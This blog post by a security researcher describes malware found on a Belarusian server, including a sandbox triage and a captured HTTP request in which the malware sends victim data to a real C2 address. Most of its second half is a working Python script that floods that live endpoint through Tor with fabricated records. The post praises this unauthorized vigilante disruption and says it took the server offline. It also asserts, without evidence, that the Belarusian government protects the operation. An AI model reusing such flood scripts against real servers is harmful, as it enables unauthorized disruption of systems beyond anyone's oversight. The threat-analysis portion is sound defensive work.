How I Stumbled Upon the Malware

While reviewing new servers listed in the intel.nuffsec.com database, one entry immediately caught my attention—it was the first belarusian🥔 server to appear in the database. Curious, I decided to dig deeper. My investigation revealed an open directory on port 12455 containing numerous files that were blatantly malicious.

Malware distribution

I downloaded all the files, promptly filed an abuse report and notified the Belarusian authorities, hoping for swift action. Days turned into weeks, and despite repeated reports from me and my colleagues, the server remained operational. This persistence led me to a troubling conclusion: either this server operates under the protection of the Belarusian government or its activities are being carried out with their tacit approval.

Such behavior in cyberspace is unacceptable. Faced with inaction, we resolved to take matters into our own hands and explore ways to disrupt their criminal activities.

Triaging the Threat

The first file I chose to analyze was “windows.exe”, with a SHA256 hash of: 71753ecf59a77395e89a84750dfe589d2bca15511105b79139777bbeacc4d916.

Thanks to the generous access provided by our friends at Recorded Future to their tria.ge platform, I was quickly able to uncover the file’s behavior. Here’s what stood out:

  1. Disabling security protections: The file actively attempts to neutralize antivirus and other defensive measures.
  2. Memory injection: It uses reflective techniques to inject itself directly into memory, avoiding detection by traditional scanning methods.
  3. Payload delivery: It connects to a remote Command-and-Control (C2) server to download and execute additional payloads or configuration files.

Further analysis revealed that the file dialer.exe sends JSON data to the same server, specifically to: http://178.124.176.209/api/endpoint.php.

POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 466
Content-Type: application/json
Host: 178.124.176.209
User-Agent: cpp-httplib/0.12.6

{"id":"qdrbsaljdwvfwdgp", "computername":"UTKBEBLO", "username":"SYSTEM", "gpu":"Microsoft Basic Display Adapter", ...}

The payload contained detailed information about the infected machine, including its hardware specifications, user credentials, and more. The C2 server would respond with a simple {"response":"ok"}.

Initially, I tried hunting for vulnerabilities on this IP or within the server itself. After countless hours of fuzzing and probing without much success, I decided to step back and rethink my approach. That’s when it hit me—the JSON data being sent by dialer.exe is likely being stored in their database.

I decided to try and disrupt their operation by overwhelming their database. Leveraging the known endpoint, I automated the submission of random machine profiles to flood their database with junk data.

I wrote a series of functions that generate the values I need (which we will leave out of the picture) and, using Tor as a proxy, I started filling their database.

def generate_unique_id():
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=16))

def generate_unique_computername():
    return ''.join(random.choices(string.ascii_uppercase, k=8))


url = "http://178.124.176.209/api/endpoint.php"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "cpp-httplib/0.12.6"
}


proxies = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

for i in range(10000000000000):
    payload = {
        "id": generate_unique_id(),
        "computername": generate_unique_computername(),
        "username": random_username(),
        "gpu": random_gpu(),
        "cpu": random_cpu(),
        "remoteconfig": "https://pastebin.com/raw/FphE0Qzc",
        "version": "3.4.1",
        "activewindow": random_active_window(),
        "runtime": random.randint(1, 10),
        "type": "xmrig",
        "pool": "ghostrider.unmineable.com",
        "port": 443,
        "algo": "ghostrider",
        "worker": "",
        "password": "x",
        "user": "USDT:TERWWhFtqzaNEsUkj7LApD8nGZ7X56qPNq.slit#t0m0-qtlf",
        "hashrate": round(random.uniform(0, 100),2),
        "status": 6
    }

    response = requests.post(url, headers=headers, json=payload, proxies=proxies)

    if response.status_code == 200:
        print(f"Request {i+1} success")
    else:
        print(f"Error request {i+1}: {response.status_code}")

    time.sleep(0.1337)

All of this led to the server being currently unavailable. We continue to explore cyberspace in order to discover its new copies and create more obstacles for cybercriminals.

Final Thoughts

Malware analysis is not just about understanding the threat; it’s about finding ways to protect others and fight back against bad actors. In this case, taking proactive steps against the C2 server not only disrupted their operation but also highlighted the importance of community vigilance in cybersecurity.